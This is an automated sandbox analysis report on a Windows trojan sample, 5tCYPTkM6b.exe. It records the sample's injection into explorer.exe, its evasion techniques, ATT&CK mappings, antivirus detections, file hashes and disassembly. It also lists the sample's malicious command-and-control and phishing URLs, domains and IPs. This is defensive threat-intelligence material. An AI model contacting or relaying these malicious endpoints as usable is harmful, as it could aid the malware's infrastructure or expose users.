          Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.298778975.0000000005F40000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.363976603.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.308798557.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.296008791.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.274396587.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanX
          Source: explorer.exe, 00000004.00000000.296328864.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.309189692.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.274571820.0000000001400000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.364274366.0000000001400000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.281179038.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.302392045.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.315675914.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe | Code function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,StrCmpNIW,lstrlenA,

          Stealing of Sensitive Information

          Source: Yara match | File source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Native API
          Path Interception612
          Process Injection
          2
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          Query Registry
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules
          Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts612
          Process Injection
          LSASS Memory121
          Security Software Discovery
          Remote Desktop Protocol1
          Clipboard Data
          Exfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager2
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
          Obfuscated Files or Information
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Software Packing
          LSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          File Deletion
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync13
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Behavior Graph ID: 562034 | Sample: 5tCYPTkM6b.exe | Start date: 28/01/2022 | Architecture: WINDOWS | Score: 100

          Start
            DNS/IP: www.postmoon.xyz; www.nbjcgl.com; 5 other IPs or domains
            Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
            -> 5tCYPTkM6b.exe 19 (started)
               Dropped file: C:\Users\user\AppData\Local\Temp\...\npsx.dll, PE32
               Signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
               -> 5tCYPTkM6b.exe (started)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                  -> explorer.exe (injected)
                     DNS/IP: www.yixuan5.com 156.246.248.162, 49820, 80 Africa-on-Cloud-ASZA Seychelles; gooooooo.xyz 148.72.244.75, 49815, 80 AS-26496-GO-DADDY-COM-LLCUS United States; 6 other IPs or domains
                     Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                     -> control.exe (started)
                        Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                        -> cmd.exe 1 (started)
                           -> conhost.exe (started)

          Source | Detection | Scanner | Label
          5tCYPTkM6b.exe | 39% | Virustotal |
          5tCYPTkM6b.exe | 35% | ReversingLabs | Win32.Trojan.Risis
          5tCYPTkM6b.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          Source | Detection | Scanner | Label
          0.2.5tCYPTkM6b.exe.2300000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          14.2.control.exe.486796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
          2.0.5tCYPTkM6b.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          2.0.5tCYPTkM6b.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.0.5tCYPTkM6b.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.0.5tCYPTkM6b.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          14.2.control.exe.53aa88.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          2.0.5tCYPTkM6b.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          2.0.5tCYPTkM6b.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          2.2.5tCYPTkM6b.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.0.5tCYPTkM6b.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          No Antivirus matches
          Source | Detection | Scanner | Label
          http://www.yixuan5.com/b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 | 100% | Avira URL Cloud | malware
          http://www.farmacymerchants.com/b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 | 100% | Avira URL Cloud | malware
          www.dreamschools.online/b80i/ | 100% | Avira URL Cloud | phishing
          http://www.carriewilliamsinc.com/b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 | 100% | Avira URL Cloud | malware
          http://www.gooooooo.xyz/b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 | 100% | Avira URL Cloud | phishing
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.yixuan5.com | 156.246.248.162 | true | true | | unknown
          www.micorgas.com | 35.186.238.101 | true | false | | unknown
          carriewilliamsinc.com | 34.102.136.180 | true | false | | unknown
          gooooooo.xyz | 148.72.244.75 | true | true | | unknown
          www.wildberryhair.com | 172.67.168.28 | true | false | | unknown
          farmacymerchants.com | 34.102.136.180 | true | false | | unknown
          freelance-rse.com | 193.141.3.66 | true | true | | unknown
          www.gooooooo.xyz | unknown | unknown | true | | unknown
          www.freelance-rse.com | unknown | unknown | true | | unknown
          www.carriewilliamsinc.com | unknown | unknown | true | | unknown
          www.nbjcgl.com | unknown | unknown | true | | unknown
          www.inslidr.com | unknown | unknown | true | | unknown
          www.postmoon.xyz | unknown | unknown | true | | unknown
          www.ehaszthecarpetbagger.com | unknown | unknown | true | | unknown
          www.farmacymerchants.com | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          http://www.yixuan5.com/b80i/?Tjox=uE8pNRih73IMph6TwINJhREQoM0gDuEUez/fX+GpYn7iSRYOEOY8W/QDgsCvwRU23ef9loG+cg==&3f9LV=d484gh1H9 | true | Avira URL Cloud: malware | unknown
          http://www.farmacymerchants.com/b80i/?Tjox=shkkGZu5/RZ8iX9p+IXF0YMrmhwzQE3Vmi1yYN92EzxfMV+N5Q/+I95GtZw5bZfv7GwSNh0c2Q==&3f9LV=d484gh1H9 | false | Avira URL Cloud: malware | unknown
          www.dreamschools.online/b80i/ | true | Avira URL Cloud: phishing | low
          http://www.carriewilliamsinc.com/b80i/?Tjox=OPDrsYDAXYudYL2hPtHgnQqdl9DF73S6Onzi++lTY4BHymNtl4pPvZlk8Nnjb/pYfVanIAZSdg==&3f9LV=d484gh1H9 | false | Avira URL Cloud: malware | unknown
          http://www.gooooooo.xyz/b80i/?Tjox=RiUiRE3mjXVt2J/JNN+P+o7W4g2/FA7pScYCkHZZbsn0kCc2XYGtZAPMcbBY0+c70SCl18kAyQ==&3f9LV=d484gh1H9 | true | Avira URL Cloud: phishing | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.autoitscript.com/autoit3/J | explorer.exe, 00000004.00000000.298803762.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.276761296.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.374119582.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.312026121.0000000006840000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://nsis.sf.net/NSIS_Error | 5tCYPTkM6b.exe | false | | high
          http://nsis.sf.net/NSIS_ErrorError | 5tCYPTkM6b.exe | false | | high
          IP | Domain | Country | ASN | ASN Name | Malicious
          148.72.244.75 | gooooooo.xyz | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
          34.102.136.180 | carriewilliamsinc.com | United States | 15169 | GOOGLEUS | false
          156.246.248.162 | www.yixuan5.com | Seychelles | 328608 | Africa-on-Cloud-ASZA | true
          Joe Sandbox Version: 34.0.0 Boulder Opal
          Analysis ID: 562034
          Start date: 28.01.2022
          Start time: 10:45:02
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 9m 44s
          Hypervisor based Inspection enabled: false
          Report type: light
          Sample file name: 5tCYPTkM6b.exe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of new started processes analysed: 29
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 1
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.evad.winEXE@7/4@11/3
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 65.9% (good quality ratio 60.5%)
          • Quality average: 71.1%
          • Quality standard deviation: 31.6%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 80.67.82.235, 80.67.82.211
          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
          • Not all processes were analyzed; the report is missing behavior information
                                              No simulations
                                              No context
          Process: C:\Users\user\Desktop\5tCYPTkM6b.exe
          File Type: data
          Category: dropped
          Size (bytes): 5249
          Entropy (8bit): 6.1160379955388935
          Encrypted: false
          SSDEEP: 96:HE4FTINLY3hqAntRxvviaXlUvIz51HicLVHpoGr8m0uTfKo234O1pLF:LONLMhqAnTxvvia0K39pNrn0MSo2344F
          MD5: 61327A82DC5ACFC628A9DDC93B1EDC0A
          SHA1: 63C2213EA0752D4CD33BC4CD26BE1F6A5D5A5A4D
          SHA-256: 1408C1FF01630D3A5FBAE695DB2B399CBDA3C4B4B43DB12B80AC8DB5C294A899
          SHA-512: CCF6C11A894171BE04737442D3BE0F4A843679B1D7E18E3458EBB74768FAB441522C4AA34FF877A50C902501EC68744A43747187BF23A284EF07E94832312212
          Malicious: false
          Reputation: low
                                              Process:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):265931
                                              Entropy (8bit):7.698831475857815
                                              Encrypted:false
                                              SSDEEP:6144:yXhg4DlE7dYexg5uqPw9CNu4dvSX0G99R+1KWGUDw:D4BEJYeyxgCNl5i0GYSU
                                              MD5:C02929E25042F9942FF27C1DB38973E3
                                              SHA1:86AA91161B74491FA9F8F9FC8D8EE0A0FCF22ED8
                                              SHA-256:ADD5757B03B27815F1B5A2E900C2995E7A077E5E46AFD6CE5E57953888F19156
                                              SHA-512:0C6A051D6B6270ED1CB77C104FAC5731A71D8D44933A0CDA7DC0D88A65A30221F732F3D457A9CF8311848394A9F20E3B733802BCF1E3F26A28FE5E9B39219AA4
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):20992
                                              Entropy (8bit):5.741923007087739
                                              Encrypted:false
                                              SSDEEP:384:i46PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbof3b:i4G1albrXY0HwinMdZeUhbovb
                                              MD5:FF94AC3A49E4C0BCDF0C1FE9730293D9
                                              SHA1:2F81D5B8EC6515FBDFA099EABB0BABF9D6C40B97
                                              SHA-256:4D2A5F508E4D6A54D71AF82FCEA978527CDD216423FB050457DFEB4DB581178F
                                              SHA-512:01F8BC3AC735473C60E842D76D282F4859FD9FECADA580BFFC629A8127A821A0839ED832143C7034B3A1E3DFCA9561841626F0B8FBE582CB6A0E7DAB453A5A16
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Users\user\Desktop\5tCYPTkM6b.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):216745
                                              Entropy (8bit):7.992922002092465
                                              Encrypted:true
                                              SSDEEP:6144:dhg4DlE7dYexg5uqPw9CNu4dvSX0G99R+1f:g4BEJYeyxgCNl5i0GYN
                                              MD5:1FABB2AB23318AC4B366E2FFB75034DD
                                              SHA1:A2ADE2676E8FA328D4A8C3640AE9BA14334BC2B2
                                              SHA-256:FAE6FF46EBDC2CFE9DBADD442892F2B569D048CFB4BCC560E32D501DD4A03F96
                                              SHA-512:6FDF083748944B9A00A2D4C57B1B832AE45C7A5E845A074890BBDADBD94967DC255EEDE9BEEDEA45CE4355E4AEE8567A42D54B85A06393A41D762E37134DB662
                                              Malicious:false
                                              Reputation:low
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.930341504736443
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:5tCYPTkM6b.exe
                                              File size:254186
                                              MD5:c2ca2ba9c38eb02217588662717ba6c3
                                              SHA1:8a897f24d2e564af2c2fcc272ab0cfbef10611b5
                                              SHA256:9af4d9ef8b2a850854ae23411d44d3603147c26898bca1010fd2f9b16f6d456e
                                              SHA512:7c7a80f37013b8b5fe27e0c9c3144884abde6ca49484c3e8c6cc78daa9f3b6ac890577247223e7d4875b865244e8732840c6a47170fbe2c7f27406ba4c8f52a6
                                              SSDEEP:6144:owKdM+LrFcBAEMQK74gFWVE2BvubTUe+xdemO+:uHLrODMV4zVfvubb+L1
                                              Icon Hash:b2a88c96b2ca6a72
                                              Entrypoint:0x403225
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:099c0646ea7282d232219f8807883be0
                                              Instruction
                                              sub esp, 00000180h
                                              push ebx
                                              push ebp
                                              push esi
                                              xor ebx, ebx
                                              push edi
                                              mov dword ptr [esp+18h], ebx
                                              mov dword ptr [esp+10h], 00409128h
                                              xor esi, esi
                                              mov byte ptr [esp+14h], 00000020h
                                              call dword ptr [00407030h]
                                              push 00008001h
                                              call dword ptr [004070B4h]
                                              push ebx
                                              call dword ptr [0040727Ch]
                                              push 00000008h
                                              mov dword ptr [00423F58h], eax
                                              call 00007FC5D4E76EF0h
                                              mov dword ptr [00423EA4h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 00000160h
                                              push eax
                                              push ebx
                                              push 0041F450h
                                              call dword ptr [00407158h]
                                              push 004091B0h
                                              push 004236A0h
                                              call 00007FC5D4E76BA7h
                                              call dword ptr [004070B0h]
                                              mov edi, 00429000h
                                              push eax
                                              push edi
                                              call 00007FC5D4E76B95h
                                              push ebx
                                              call dword ptr [0040710Ch]
                                              cmp byte ptr [00429000h], 00000022h
                                              mov dword ptr [00423EA0h], eax
                                              mov eax, edi
                                              jne 00007FC5D4E743BCh
                                              mov byte ptr [esp+14h], 00000022h
                                              mov eax, 00429001h
                                              push dword ptr [esp+14h]
                                              push eax
                                              call 00007FC5D4E76688h
                                              push eax
                                              call dword ptr [0040721Ch]
                                              mov dword ptr [esp+1Ch], eax
                                              jmp 00007FC5D4E74415h
                                              cmp cl, 00000020h
                                              jne 00007FC5D4E743B8h
                                              inc eax
                                              cmp byte ptr [eax], 00000020h
                                              je 00007FC5D4E743ACh
                                              cmp byte ptr [eax], 00000022h
                                              mov byte ptr [eax+eax+00h], 00000000h
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
                                               Name | Virtual Address | Virtual Size | Is in Section
                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
                                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                               .text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                               .rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                               .ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               .rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94693169534 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               Name | RVA | Size | Type | Language | Country
                                               RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
                                               RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
                                               RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
                                               RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
                                               RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
                                               RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
                                               DLL | Import
                                               KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
